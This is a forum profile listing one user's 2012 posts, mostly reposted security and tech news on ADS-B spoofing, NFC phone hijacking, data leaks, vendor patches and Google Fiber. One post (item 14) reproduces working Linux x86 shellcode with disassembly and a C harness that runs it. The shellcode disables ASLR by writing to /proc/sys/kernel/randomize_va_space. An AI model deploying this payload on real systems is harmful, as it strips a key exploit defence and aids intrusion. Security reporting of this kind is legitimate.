DarkyAngel

Everything posted by DarkyAngel

  1. Air Traffic Control Systems Vulnerabilities Could Make for Unfriendly Skies [Black Hat] Researcher Andrei Costin discusses the security challenges facing ADS-B technology and how attackers can spoof air traffic signals. The skies may not be as friendly as some people think. In a talk at the Black Hat USA conference, security researcher Andrei Costin discussed the possibility of spoofing signals to air traffic control systems in attacks – all courtesy of roughly $1,000 worth of equipment. After his presentation, he sat down with SecurityWeek and revealed more details of how attackers could exploit weaknesses in the Automatic Dependent Surveillance-Broadcast (ADS-B) technology. Costin, who is a PhD candidate at Eurecom - a research institute in France - said that the security issues he talked about in his presentation have been known for a while, though no one had actually demonstrated them. The weaknesses he demonstrated could potentially have large future implications, as the U.S. has mandated that the majority of aircraft operating within its airspace be equipped with some form of ADS-B Out by 2020. "Our intent was to make a practical demonstration of the attack, [with] the idea that the right people see the easiness and the cheapness of the attack so they can fix it now before they have the potential of a user can do the same thing," he said. To launch the attack, he used software-defined radio, which he said could be purchased for around $1,000. He also used an ADS-B receiver in order to verify the spoofed messages were being accepted. Because there is no encryption or authentication mechanism protecting ADS-B messages, the information can be intercepted and spoofed by attackers. For example, the attacker could mount a replay attack, intercepting packets with flight information in the air and then replaying them back to a targeted system. 
"It is impossible to verify that the message is a real one or a spoof, and that it comes from a legitimate aircraft or device," he said. "It's an architecture issue…the protocol and the messages have to be improved in order to support authentication and encryption." This could have safety as well as privacy concerns, because an attacker could determine the location, for example, of a private jet. Though it is possible to use filed flight plans to rule out a spoofed signal indicating a plane is at a particular place, that becomes difficult if there are a large number of planes involved, Costin explained. He said he is unaware of any attacks like this taking place in the wild, though he speculated that it would be just a matter of time before it happened. "The complexity I would say is medium," noting that acquiring the necessary hardware is simple, but the attacker would need to have some knowledge of digital signal processing. In a statement released to the media, the Federal Aviation Administration said it conducts ongoing assessments of ADS-B vulnerabilities and has a "security action plan" that mitigates risk. The agency also stated that it monitors the "progress of corrective action," and plans to maintain about half of the current network of secondary radars as a backup to ADS-B in the event it is needed. Costin, however, was more skeptical of the situation. "The main mitigation that is currently helping is that they don't use [ADS-B] as a primary…radar," he said. Source
  2. AuthenTec makes fingerprint sensors and identity management software for mobile devices. Apple's Cupertino campus. Apple is getting serious about mobile security. The Cupertino, Calif., company has agreed to acquire security technology company AuthenTec for $356 million, according to a filing with the Securities and Exchange Commission made by AuthenTec. The $8-a-share offer for AuthenTec represents a 58 percent premium over its Thursday closing price of $5.07. CNET contacted Apple for comment. We'll update the story when the company responds. An AuthenTec spokesman confirmed the deal but said it wouldn't be adding any more detail. Apple is just the latest company to get swept up in the increasing interest in mobile security. With increasing reports of mobile malware, viruses, and other threats, the wireless industry has stepped up its defenses. Carriers such as AT&T and Sprint Nextel are increasingly talking about security as the next big service, while a number of mobile security firms have sprung up in recent years. AuthenTec makes fingerprint sensors and identity management software that's deployed in mobile devices, computing and networking companies, service providers, and governments. It counts Samsung Electronics, LG, Cisco Systems, and Motorola among its customers. Earlier this month, Samsung tapped AuthenTec's virtual private network security to power its business-class smartphones and tablets. Source
  3. Happy sysadmins day! Let's raise the 1336,(9) glasses in their honor!
  4. DarkyAngel

    Hello Rst

    what did you manage to steal with them that you're so passionate? welcome aboard.
  5. The online call service company responds to recent chatter that it was lax on security and privacy, especially when it came to government peeping. Skype has come under fire this past week for allegedly letting the U.S. government use its service to spy on its users. The online call service company is now saying that's simply not true. "Some media stories recently have suggested Skype may be acting improperly or based on ulterior motives against our users' interests," Skype Chief Development and Operations Officer Mark Gillett wrote in a blog post today. "Nothing could be more contrary to the Skype philosophy." Skype serves 250 million active users a month and supported 115 billion minutes of calls in the last quarter. It is specifically being accused of facilitating law enforcement wiretapping of conversations. These accusations point to changes that have happened in the service since it was bought by Microsoft in May 2011, most notably the way calls can be intercepted. In the blog post, Gillett goes point by point to explain Skype's side of the story. Here are some highlights: According to Business Insider, Skype keeps users' personal information in its system for 30 days, which is probably why it mentions that it will cooperate with law enforcement when "legally required and technically feasible." However, Federal investigators got access to Skype conversations between Megaupload founder Kim DotCom and his colleagues over the course of five years and supposedly didn't have to ask Skype for anything. Nevertheless, Skype maintains that its primary interest is providing the best product it can to its users. "In addition to solving the challenges of scaling and providing reliable, dependable communications that people love, we operate globally and have an obligation to operate responsibly," Gillett wrote. "We are committed to doing a great job at both -- providing a phenomenal experience for all users, and acting as a responsible global citizen." Source
  6. An unsecured wireless network led an Indiana SWAT team to the wrong house. An Indiana SWAT team recently followed up on anonymous online threats by bursting into a house using flash grenades -- only to find that they had come to the wrong place. "Turns out the home had an open Wi-Fi router, and the threats had been made by someone outside the house," writes Ars Technica's Nate Anderson. "Whoops." "Imagine you're sitting at home, comfortable on the couch, watching the Food Network, when all of a sudden a heavily armed SWAT team breaks down your door and storms into your living room," writes SecurityNewsDaily's Matt Liebowitz. "That's what happened to 18-year-old Stephanie Milan, who was watching TV in her family's Evansville, Ind., home ... when a team of police officers broke down her storm door -- the front door was already open -- and tossed a flashbang stun grenade into the room." "Workers were at the Milan home on Friday repairing the storm door and broken window," write the Evansville Courier & Press' John Martin and Mark Wilson. "Carpet inside the house was stained with black residue from the flashbang grenade." "A day after the raid, 18-year-old Stephanie Milan’s cellphone and laptops were still being held by police," writes Digital Journal's Anne Sewell. "Moral of the story: just smack a password on your router," writes Geekosystem's Sui Ying Teoh. The news is fairly old (~1 month), but it's worth posting; I saw it isn't on here.
  7. How do you provide military-grade secure wireless network connectivity to 6,000 hackers? We take a look inside the Network Operations Center at the Black Hat 2012 conference. LAS VEGAS. With over 6,000 attendees, the Black Hat Wi-Fi network is one of the most hostile networks on Earth. Attendees routinely test the network and attempt to exploit both the show as well as other attendees. The job of provisioning and defending the Wi-Fi network at Black Hat falls to Aruba Networks. It's a job that Aruba has been doing at Black Hat both officially and unofficially for the last seven years. For this year at Black Hat, Aruba deployed more than 35 access points across multiple session rooms to deliver seamless connectivity. Aruba engineer Robbie Gill explained to eSecurity Planet that approximately 15 of those access points are connected in a mesh topology. In a mesh, each access point can connect to another access point in order to provide backhaul connectivity. The others can be directly connected to the main controller. Rogue access points are one of the challenges faced by Aruba. Clogging the available spectrum, these rogue access points often turn out to be mobile handsets with Wi-Fi sharing capability turned on. Donald Meyer, senior manager of product marketing at Aruba, explained that his company has a technology called Adaptive Radio Management (ARM) that will automatically move across different channels in order to find one that is less congested. For end users, there is no disruption as the Aruba network continuously adjusts to conditions in the air. Aside from rogue access points, Gill faces other types of challenges as well -- including denial of service and spoofed access points with Karma. At this year's event, Aruba is only providing WPA-PSK security, as opposed to the more robust EAP/TLS (Extensible Authentication Protocol – Transport Layer Security). With EAP/TLS each user has their own key, whereas with PSK the key is known. 
As such, WPA-PSK is not as secure as the EAP/TLS option that was available in 2011 at Black Hat. Gill noted that as long as users maintain proper security best practices -- not sending data over clear text and sticking to HTTPS/SSL secured sites when submitting sensitive information -- there shouldn't be much risk. Watch the full video: Source
  8. hmm, I haven't tested it, I'm not home until Monday.. it probably used to work a while ago
  9. As some broadband providers grumble about the cost of network upgrades and threaten data caps on subscribers, Google shows them, through its Kansas City Google Fiber project, how to offer subscribers 1Gbps broadband service at an affordable price. Google is showing the cable companies and telecommunications providers how a broadband network should be built. On Thursday, the company took the wraps off its new Google Fiber and Google Fiber TV services, which through a fiber connection directly to the home, delivers broadband speeds of 1Gbps on both the upload and download links. It also announced its new Google Fiber TV service that offers a vast array of high quality HD video content broadcast to TVs and is also available on demand. The services that Google is delivering to lucky residents of Kansas City, Mo., and Kansas City, Kansas, is leaps and bounds above what they can get currently through providers, such as AT&T's U-verse service or Time Warner Cable. But it's also much more advanced than what the average American is able to access from any cable operator or telco broadband provider in the country. And Google is offering it at prices that beat the local and even national competition. In fact, Google will be delivering speeds that are more than 100 times faster than most broadband users get today. And on the TV side, the company has included enhancements, such as doubling the number of TV shows that can be recorded by a DVR at one time, plus it offers more than 500 hours of storage for very high quality HD video. Google hasn't said yet whether it will deploy a fiber network in any other cities. The company is focused on Kansas right now. But it's clear that the deployment is strategic for Google. Even though most users today don't need Internet access at 1Gbps, Google is showing what's possible. And the company hopes that applications and uses for the ultra fast network will evolve to fill the pipe. 
But the network itself is also a way to show the rest of the broadband industry how they should be building their own networks to offer much faster speeds, which in the long run benefits Google's advertising and search businesses. And it offers Google data that it can use to nudge cable operators and phone companies to be more aggressive in upgrading networks and offering services at lower prices. "This is a strategic business for Google," Kevin Lo, general manager for Google Access, said in a phone interview from Kansas City. "And on a national level, this is about innovation and access to an abundance of technology. There is a bottleneck right now in residential access where people are only getting speeds of 5 Mbps." And even though he didn't directly say it, he made the point that the Google Fiber network can be seen as a challenge to what broadband providers have offered in the past. "The last time we doubled the speed of broadband a whole new market evolved and spurred tremendous growth in the Internet," he said. "We don't want incremental change. Offering you a 10 Mbps service and edging it to 50 Mbps and then 100 Mbps, that's not what drives real innovation. We need to do something in a big way that will take a material step in performance." What Google can teach broadband operators Google's chief financial officer, Patrick Pichette, described during the presentation introducing Google Fiber how computing power thanks to Moore's Law has grown through the years doubling every 18 months. And he showed how the cost of network storage has fallen dramatically, paving the way for cloud-based services such as the ones offered by Google. But network access speeds have remained relatively flat over the past several years. The result has been only incremental changes in the speed of services that are offered to consumers. "We saw a doubling of speeds for Internet access in the early years as we went from 14 kbps to 28 kbps," said. 
"But then after the cable modem showed up, we've seen little progress in access." Pichette also pointed out that even though speeds have only increased incrementally on a per megabit basis, Americans are still paying more for Internet access than consumers in other countries. And this is where Google is also showing existing operators a thing or two. Google is offering 100 times faster speeds on a service that is less than half the cost of the fastest Internet services available in the country today. The 1Gbps broadband-only service is only $70 and also includes 1 Terabyte of data storage. This compares to Verizon's Fios service, which charges $205 for a 300 Mbps service with 65 Mbps uploads. Like Google, Verizon also delivers its broadband service over a fiber connection linked directly to the home. But unlike Google it doesn't offer these faster speeds with symmetrical bandwidth speeds. When packaged with its TV service, Google's services are also priced affordably. And they beat the offerings from local competitors, such as Time Warner Cable. For $120 a month, Kansas City residents can get the 1Gbps broadband service and the Google Fiber TV service plus 1 Terabyte of data in Google's cloud storage service Google Drive. Google is even throwing in the $200 Google Android Nexus 7 tablet at no additional cost, so that users can use the Android App to control the TV service and even watch TV on their tablet. And Google is giving away basic broadband service with speeds up to 5Mbps downstream and 1Mbps upstream for free for the next seven years, so long as users pay the $300 cost of hooking the fiber up to their home. Time Warner Cable, Google's biggest competitor in this market, offers a 50 Mbps Internet service for an introductory price of $80 a month. And its total package with TV service and home phone service included is $200 a month. 
Time Warner was unable to put an executive on the phone to discuss the differences between the Time Warner network and the Google Fiber network, but a spokesman said this in a statement: "Kansas City is a highly competitive market and we take all competitors seriously," he said. "We have a robust and adaptable network, advanced products and services available today, and experienced local employees delivering local service. We are confident in our ability to compete." For Google, Lo said competition is necessary to drive the market. "At Google we think competition is always a good thing," Lo said. "In our core business, we are always a click away from being irrelevant, so our engineers wake up knowing that they must stay ahead of the competition." Google has been tight-lipped about if or where else it might deploy a similar fiber network. But even if the company doesn't expand the service beyond Kansas City, the fact that it has been able to develop a service that offers so much bandwidth could be enough to shake things up among broadband providers. "At this point you'd be hard-pressed to see any reason to have 1Gbps connections into a home," said William Weeks, technology fellow at TEconnectivity, a company that helps operators deploy fiber networks. "I think what Google is trying to do here is prove the business case for building such a network and offering these speeds. They'll have their own numbers that they can show if the cable operators and telcos tell the FCC that they can't build more capable networks more rapidly." Indeed, Google seems to be making the case for why broadband providers need to up their game and offer faster services at lower prices. And even though the network won't be a direct threat to cable operators like Comcast or Verizon, which don't offer service in Kansas City, it could be used as a counter-argument to these companies' complaints and threats about Google and other Internet services eating up too much bandwidth. 
Recently, Internet service providers, such as Time Warner Cable and Comcast, have placed limits or caps on their services. And some have suggested that Internet companies, such as Netflix, should pay more for content delivered to their customers over a broadband provider's network. Google's execs say that with a fiber network, there is no need for these restrictions. And the company has not put a cap on broadband usage. Google as market instigator The Google Fiber initiative isn't the first time that Google has tried to push the market forward. In 2007, the company lobbied for open access conditions on wireless services that used the 700 Mhz spectrum block. And after it won that battle, in 2008 it bid on the spectrum, forcing the winner of that auction, Verizon, to adhere to FCC requirements. Google has also dabbled in community-based Wi-Fi and launched a citywide network in Mountain View, Calif. It's also deployed a broadband network at Stanford University. And in 2010 it unveiled plans to build the Google Fiber network. More than a thousand cities wanted to be considered for the network. But Google chose Kansas City. In other parts of its business, Google has entered new markets to stir things up and drive innovation. Its Nexus line of mobile products has been developed to use the best components available to make the most technologically advanced mobile devices. The hope is that developers use these devices to create new applications and innovate in mobile. "I think in general people misinterpret our motivations for building the Nexus products," Patrick Brady, who works for Google and helps develop the Nexus products, said in a recent interview when asked if Google is concerned about making money on its Nexus products. "It's about building and driving the ecosystem." 
The same strategy is likely taking shape here, where Google is likely not going to emerge as a nationwide broadband player but instead is trying to shape the broadband business to increase speeds and thus increase the functionality of its own Google products. While commercial broadband providers may be slow to ramp up speeds and drop prices to make high-speed network connections affordable to the masses, other organizations have sprung up to push more fiber-based networking. Last summer, a consortium of universities called GigU banded together to deploy 1Gbps fiber networks in communities and towns near universities. And earlier this summer, the White House along with the National Science Foundation's GENI (Global Environment for Network Innovation) program launched "US Ignite," an initiative that will bring startups together with local and state governments, federal agencies, universities, and others in the tech community to develop a national 1Gbps network. "We know we are going to need more network capacity as we do more things online," said Jim Baller, president of the Baller Herbst Law Group, who has advocated for community-based fiber networks for years. "But the question is how will we get there? And that's what these initiatives are doing, which is bringing players together and stimulating interest and dialog." Source
  10. With new features for enterprise mobile app developers, Oracle Identity Management 11g Release 2 enables the extension of authenticated access beyond the four walls of the organization. In enterprise IT, identity is a cornerstone technology providing authorized access to employees in a manner that can be tracked for compliance. It's a role that Oracle's Identity Management portfolio has been providing for years for wired devices -- and is now being extended in the 11g R2 release to a new generation of mobile requirements ushered in by Bring-Your-Own-Device (BYOD) trends. Amit Jasuja, vice president of development for Oracle's Identity Management and Security Products, explained to eSecurity Planet that the new release takes care of a number of persistent mobile challenges. One of those challenges is the issue of cached passwords on mobile devices. With many mobile apps, passwords are cached on the device, in an effort to make them easier to use. The risk is that if that password is not properly secured in the cache, the user identity could be at risk. "Companies that are building apps have typically been rolling their own security solution for passwords on the mobile side," Jasuja said. "What we're doing is providing a layer on top of our web single sign-on that extends to mobile apps." Jasuja added that the mobile apps also need a security client that provides proper procedures for password hashing protection. As part of the Oracle Identity Management 11g Release 2 update, there is a Software Development Kit (SDK) for mobile developers that provides the tools necessary to natively talk to the REST interfaces that are available on the server side. REST is a web protocol that is used for the transport of data, including identity information. Going a step further, the identity engine leverages the OAuth standard to enable single sign-on across multiple mobile applications. 
"We've had the single sign-on experience in the web world and now we're extending that to the mobile world," Jasuja said. Social identity integration is also part of the identity release. Using the OpenID standard, Oracle can now also pass identity information to social sites as well as web signups. The way that works is when user information needs to be submitted for a particular site, there is a dialog box that pops up asking for authorization. Once that authorization is given, the user information can be transferred to the third party site in a secured manner. The Oracle Identity Management 11g Release 2 builds on the existing capabilities that the initial release of the platform first delivered. "The whole message here is with Oracle Identity Management 11g Release 1, customers had a platform that provided basic capabilities around user provisioning and web single sign-on," Jasuja said. "Now we're taking those capabilities and extending them into the mobile, social, and cloud world." While Oracle is extending identity to mobile devices, it is not delivering a full Mobile Device Management (MDM) experience. "When you think about MDM and BYOD, we're not focusing on that as that's not our core market," Jasuja said. "Our focus is on companies that are building apps for their customers." That said, Oracle's software does have the ability to identify a number of mobile characteristics that are sometimes associated with MDM technologies. For example, jailbroken devices can be detected and whether or not there is a password policy for the device. "We do have integration with device characteristics but it's not full MDM," Jasuja said. "We are working with MDM vendors, to provide tighter integration in the future." Source
  11. Password leak at meetOne A data leak at the meetOne dating site allowed anyone to access private data including the plaintext passwords, email addresses and real names of the site's approximately 900,000 members. To obtain the data, an attacker simply needed to increment a URL parameter. After they were informed by The H's associates at heise Security, the operators soon closed the hole. When news of a data leak in one of the dating portal's custom APIs was disclosed to heise Security, the editors managed to reproduce the problem and access the data of a specially created test profile. The API disclosed information including the email address and password of the test user, which allowed access to the user's profile. Once logged in, the editors could have accessed any data, private messages and photos stored with the user profile. However, logging in wasn't actually required to retrieve sensitive information – most of the data was already available through the API. Labels such as "sexuality", "childrenNumber", "schooling", "yearlyIncome", "relationshipTyp" or "searchOneNightStand" provide some idea of the havoc a malicious data thief could have wreaked with this information. After heise Security informed meetOne co-founder Nils Henning, the vulnerability was closed within hours. Henning said that the "scope of the hole is limited" because "no sensitive data such as billing information was retrievable at any time". The executive didn't clarify why the company thought that information such as plaintext user passwords was not considered to be "sensitive data". The operators cannot guarantee that the hole has not been exploited in the past and say that they have "reset all passwords". However, on checking at 7.30 pm on Wednesday evening, all passwords that were tested by heise Security were still functional. 
To be safe, users who have previously created a profile with this site should change their password – and, importantly, they should also change passwords on any other services where they may have used the same password. Founded in Germany, the dating portal is now operated by US company meetOne International LLC. Nils Henning continues to work for Hamburg-based meetOne GmbH, a company that now regards itself as a service provider to the LLC and "mainly handles support tasks". Source. When is it Facebook's turn?
  12. IBM closes holes in mail filters and WebSphere MQ IBM has patched two security flaws in the mail filters of Lotus Protector for Mail Security and Proventia Network Mail Security that affect all versions of these products. A cross-site scripting vulnerability allows an attacker to inject JavaScript code into the browser of an administrator with an active session on the system. The other vulnerability allows administrators to gain access to files on a server that they should not have access to. Both vulnerabilities have been patched for versions 2.5.x, 2.8.x and later of the affected products. Users with older versions of the software must upgrade to version 2.5.x before they can install the patch. IBM has also patched a flaw in version 7.1 of its WebSphere MQ communication platform. The vulnerability allows users to access the queue manager even if they are not allowed to do so. This problem has been fixed in Fix Pack 7.1.0.1 for WebSphere MQ. Source
  13. Oracle's file converter holes endanger many server services Some of the holes that Oracle closed last week affect more than just Oracle software, because Oracle's Outside In library is used in many other products to convert files of different formats. As well as Microsoft's Exchange Server and SharePoint, products from Cisco, HP, IBM, Novell, Symantec, McAfee and others are affected. Strictly speaking it is not a single hole, but fourteen holes in the parsing of certain types of file. The affected file formats are .VSD, .WSD, .JP2, .DOC, .SXD, .LWP, .PCX, .SXI, .DPT, .PDF, .SAM, .ODG and .CDR. A program that opens a specially crafted file with the Oracle libraries is fundamentally compromised. A range of server services are affected, including anti-virus scanners like McAfee GroupShield, but also specific desktop applications that need to handle different file types, such as the Guidance EnCase Forensic toolkit. One of the US-CERT advisories lists a number of companies and products that use the Oracle libraries and are also vulnerable. Among them are Cisco Security Agent, Guidance EnCase Forensic, Kroll Ontrack, IBM OmniFind Enterprise Edition, Novell Groupwise, McAfee GroupShield and Host Data Loss Prevention, and Symantec Enterprise Vault. A longer version of the US-CERT list apparently does not include all affected products; for example Avira Antivir for Exchange is reported to also use Outside In. It is still unclear whether all products that use Outside In are vulnerable – there are, for example, several print servers on the list. Microsoft has a dedicated advisory published on the vulnerability. It is also unknown whether, or when, the various manufacturers will have patches for their products ready for customers. Update 26-07-12: Avira has told The H's associates at heise Security that Antivir for Exchange is using Microsoft Jet Engine and Microsoft Access as its database and is therefore not affected by the vulnerability. Source
  14. linux/x86 - ASLR deactivation

      /*
      Title: Linux x86 ASLR deactivation - 83 bytes
      Author: Jean Pascal Pereira <pereira@secbiz.de>
      Web: http://0xffe4.org

      Disassembly of section .text:

      08048060 <_start>:
       8048060: 31 c0                 xor    %eax,%eax
       8048062: 50                    push   %eax
       8048063: 68 70 61 63 65        push   $0x65636170
       8048068: 68 76 61 5f 73        push   $0x735f6176
       804806d: 68 69 7a 65 5f        push   $0x5f657a69
       8048072: 68 6e 64 6f 6d        push   $0x6d6f646e
       8048077: 68 6c 2f 72 61        push   $0x61722f6c
       804807c: 68 65 72 6e 65        push   $0x656e7265
       8048081: 68 79 73 2f 6b        push   $0x6b2f7379
       8048086: 68 6f 63 2f 73        push   $0x732f636f
       804808b: 68 2f 2f 70 72        push   $0x72702f2f
       8048090: 89 e3                 mov    %esp,%ebx
       8048092: 66 b9 bc 02           mov    $0x2bc,%cx
       8048096: b0 08                 mov    $0x8,%al
       8048098: cd 80                 int    $0x80
       804809a: 89 c3                 mov    %eax,%ebx
       804809c: 50                    push   %eax
       804809d: 66 ba 30 3a           mov    $0x3a30,%dx
       80480a1: 66 52                 push   %dx
       80480a3: 89 e1                 mov    %esp,%ecx
       80480a5: 31 d2                 xor    %edx,%edx
       80480a7: 42                    inc    %edx
       80480a8: b0 04                 mov    $0x4,%al
       80480aa: cd 80                 int    $0x80
       80480ac: b0 06                 mov    $0x6,%al
       80480ae: cd 80                 int    $0x80
       80480b0: 40                    inc    %eax
       80480b1: cd 80                 int    $0x80
      */

      #include <stdio.h>
      #include <string.h>

      char shellcode[] = "\x31\xc0\x50\x68\x70\x61\x63\x65\x68\x76\x61\x5f\x73\x68"
                         "\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61"
                         "\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f"
                         "\x73\x68\x2f\x2f\x70\x72\x89\xe3\x66\xb9\xbc\x02\xb0\x08"
                         "\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31"
                         "\xd2\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\x40\xcd\x80";

      int main()
      {
          fprintf(stdout, "Length: %zu\n", strlen(shellcode));
          /* cast the byte array to a function pointer and call it */
          (*(void (*)()) shellcode)();
      }

      # 1337day.com [2012-07-26]

      Source
  15. In addition to this article ..

      Android and Nokia smartphones hijacked via NFC

      At the Black Hat information security conference in Las Vegas, security specialist Charlie Miller has demonstrated the potential risks of Near Field Communication (NFC), a standard that has already been integrated into many smartphones: the researcher managed to use NFC to infect smartphones from different manufacturers with malicious code – without any need to interact with the smartphone owner.

      During his nine months of research, Miller focused on the applications that access the radio interface. The most well-known app is probably Google's Beam, which has been factory installed on all Android devices since Android 4.0 (Ice Cream Sandwich). If a victim's smartphone is placed in the vicinity of a tag that has been tampered with, the phone's browser will be launched and will access a web site – in this case one that contains malware exploits for Android.

      For the demonstration, Georg Wicherski from Crowdstrike contributed a vulnerability in the Webkit browser of older Android versions (up to Gingerbread) that allowed Miller to take control of the device. The researcher says that 90% of all Android devices still have an old, and therefore vulnerable version of Android installed. The bug can, in principle, also be deployed via other channels, but the NFC technology allows infections to be successful without any user interaction.

      The Nokia N9, which uses Nokia's MeeGo operating system, was infected in a different way: the device is factory set to accept arbitrary NFC communication and will, for example, automatically display images or Office files that are sent this way. Miller says that the file rendering applications contain numerous bugs that can cause buffer overflows and enable attackers to take control of a device.

      An attacker can also activate the N9's Bluetooth interface via NFC and then pair the device with a notebook. According to Miller, it is then possible to send premium-rate SMS text messages or call premium numbers, export the address book, and access the N9's filesystem.

      As NFC only has a range of a few centimetres, attackers and their NFC tags or NFC-enabled phones must get very close to their victims. Miller therefore considers it more likely that malicious tags could, for instance, be attached to advertising posters, or that NFC terminals could be exchanged for modified ones.

      Source
  16. YouTube offers a face-blurring feature in videos

      YouTube has introduced a new option that allows faces to be hidden. With a single click, users can access the face-blurring feature in videos uploaded to the site.

      The technology is not perfect, so hiding faces in videos posted on YouTube can produce errors, but the feature looks like a step forward for preserving online anonymity, CNET writes. The "Face Blurring" feature introduced by YouTube is not selective, so all automatically detected faces will be hidden.

      To access it, click your username on the YouTube page and open Video Manager. Once you have chosen the video you want, use the menus Enhancements > Additional Features > Apply. If you are happy with the results, the Save As button permanently modifies the uploaded video.

      Unfortunately, the new YouTube feature will also protect those who film themselves doing stunts behind the wheel on the motorway or torturing animals, and will make it harder to identify and punish them.

      Source
  17. Black Hat: Hacking Back - The Best Defense May Not be the Best Offense

      A new survey of Black Hat attendees shows many are not afraid to fight back against hackers with their own tactics.

      The legalities of cyberspace can be complex – particularly when organizations consider whether offense is the best defense. Nevertheless, the subject of just where the line is came up in more than one talk at the Black Hat USA conference in Las Vegas.

      During his presentation, Robert Clark, operational attorney for U.S. Cyber Command, laid out this scenario: you are a system administrator, and poor security practices lead to theft of intellectual property on your watch. "What…is my first thought - if I pick up the phone and call the CEO, I'm freaking fired," he said. "I'm out of a job. So what can I do?"

      While it might be tempting to dig through your organization's logs, track the data theft to its source and delete the files off the server, that action can be fraught with legal dangers, he explained. For example, accessing the server could be a violation of the Computer Fraud Abuse Act, he noted. "So you're in there, and you see your files there…I've got to elevate my privileges to delete [the files] off of there…. congratulations, count two of the Computer Fraud Abuse Act," he said.

      Earlier this week, nCircle polled 181 people at the Black Hat conference in Las Vegas and discovered 36 percent said they engaged in retaliatory hacking in the past. “There’s a huge difference between a security expert who can qualify attackers and apply appropriate responses and a neophyte who reacts blindly," said nCircle CTO Tim 'TK' Keanini. "The best strategy for most companies is to forget retaliation and concentrate on improving their defenses.”

      During his presentation at Black Hat, former FBI Assistant Director Shawn Henry argued that organizations needed to "step up" in the fight against cyber-criminals – but added that he did not mean cyber-retaliations should be in play. Instead, organizations should focus on gathering intelligence that can be used to both catch and defend against attackers. "We need to understand who the adversary is, because if we understand who they are, we can take proactive measures," said Henry, who today is president of CrowdStrike Services, an arm of security startup CrowdStrike.

      While more than a third responded to the company's survey stating that they had either hacked back once (23 percent) or frequently (13 percent), Keanini said the actual percentage may be even higher. “Retaliatory hacking is a huge topic at Black Hat this year, but we should take these survey results with a grain of salt,” he said. “It’s safe to assume some respondents don’t want to admit they use retaliatory tactics. It’s very tempting to strike back out of anger and frustration. However, as infuriating as cyber criminals can be, this ‘eye for an eye’ code of justice can be extremely dangerous."

      Source
  18. Apple Pulls Security Covers Back at Black Hat

      Apple has not always been the most open company when it comes to discussing security. But for roughly an hour Thursday, Dallas De Atley, manager of the platform security team at Apple, stood in front of a crowd of attendees at the Black Hat USA conference and outlined the company's approach to protecting iOS.

      When Apple began designing the iPhone, he said, the company quickly realized there were aspects to developing a secure smartphone that were different from other computers at the time. That idea helped drive the phone's security model. "Security is architecture - you have to build it from the very beginning," he said.

      Unlike a laptop, a phone is "always connected" and "does not fully go to sleep" like a laptop would if a user closed the lid, he said. The fact that a smartphone can contain a significant amount of personal data and be easily misplaced also played an important role in Apple's approach, he added.

      Starting with Apple's Secure Boot chain and continuing on to the topics of code signing and sandboxing, De Atley did not cover any unexpected ground; instead, he largely rehashed material from a whitepaper Apple released in May.

      While Google Android has been the focus of attention for much of the malware in the mobile world, the iPhone has not been without its challenges. The company's approach has not stopped researchers from poking around and trying to figure out ways to circumvent Apple's protections. In fact, a number of talks at Black Hat covered exactly that, attempting to poke holes in the iOS security blanket in order to steal data from the phone.

      "The phone has personal data," he said. "It knows who you call, who you send email to, what websites you visit (and) what games you play. These devices know an awful lot about how we live our lives, and they've become a critical part of how we interact with people."

      Source
  19. Firefox 16 will integrate web apps and Firefox OS compatibility

      Mozilla has introduced web app compatibility in the alpha version of Firefox 16. The new browser will also include compatibility with Firefox OS, an operating system expected in 2013.

      While Firefox 15 is only in beta, with a release date in August, Mozilla is hard at work integrating web apps into the next version, Firefox 16. The company will also open Mozilla Marketplace by the end of the year, from which users will be able to download apps, CNET writes.

      Firefox 16 includes numerous improvements, from interactions with VoiceOver on Mac to functionality improvements for reading PDF files. Mozilla is preparing web apps for both Firefox 16 and Firefox OS, the mobile operating system to be launched early next year, aiming to offer users the same experience regardless of the platform used.

      Source
  20. See what the Lumia 910 and the main Windows 8 wallpaper look like

      More new information about Windows 8 and Windows Phone 8 reached the web today. The sources are credible, so we are presenting the news as well.

      Windows Phone 8 - Lumia 910 / 920

      First, it seems we already have an almost confirmed date for the launch of the first Nokia smartphones with Windows 8. These are the Nokia Lumia 910 and Nokia Lumia 920, according to the site WPdang (China), cited by Slashgear, which will be launched on 5 September in Helsinki, at the Nokia World event.

      The price of Microsoft Surface could be too high

      According to Geek.com, Microsoft could sell the first model of the Surface tablet PC at a price far too high to be competitive in a market already dominated by big names. A site in Sweden has already put the Microsoft tablet on sale (for pre-orders) at a price of over a thousand dollars (1005 dollars). Microsoft has not commented on the information so far, but if this price is confirmed, Microsoft could record a major marketing failure with its first tablet.

      The default Windows 8 wallpaper has appeared

      Microsoft is preparing to announce the launch of Windows 8 RTM, and the final details about the operating system are starting to "leak" onto the internet. TechIT, cited by The Verge, claim to have obtained the main wallpaper of the new operating system. The two flowers in the default Windows 8 image are meant to compete with the famous Bliss, which made its name over the lifetime of Windows.
  21. DeadMouse - browse the web with the keyboard only (Google Chrome)

      A new extension for the Google Chrome browser allows online browsing with the keyboard only, without a mouse. DeadMouse lets the user easily pick links on the page by starting to type the text associated with them.

      Browsing online with only the keyboard is simpler than it sounds with the DeadMouse extension for Google Chrome. The extension scans the page text that includes links and then shows the user the link chosen based on the text typed on the keyboard, LifeHacker writes.

      Once a link has been selected through the DeadMouse extension, the user can open it or use the "Tab" key to move between the options offered by the program. The "Enter" key opens links in Google Chrome with the DeadMouse extension, and the "Del" key cancels the selection.

      For now, the Google Chrome extension is not 100% functional when it encounters Flash elements on the pages visited.

      Source
  22. NFC technology, the next target for hackers

      NFC technology, which allows data transfer between two gadgets over a short distance, is the next target for hackers, who could "break into" a phone simply by standing next to its owner.

      Used in more and more countries, including for direct payments by mobile phone, NFC technology is vulnerable to attacks by skilled hackers who can get close enough to the target, VentureBeat writes. For now, NFC technology does not have many vulnerabilities, but one of them was successfully exploited in an attempt to hack a Nokia N9 phone via NFC.

      Charlie Miller, a security specialist at Accuvant Labs, demonstrated how one phone can connect to another via NFC and how, after control of the Bluetooth connection is taken over, all the data on the phone can be transferred by the hacker to their own device.

      Hacking NFC technology could also be used to send SMS messages through the attacked phone. The most obvious solution for security against NFC attacks would be an option for the user to manually confirm any connection.

      Source
  23. Black Hat: Smart Meter (In)Security Spotlighted in Talk

      Security researcher Don C. Weber spoke about OptiGuard, a tool that can be used to assess the security of smart meters. The talk was pulled earlier this year at the ShmooCon conference.

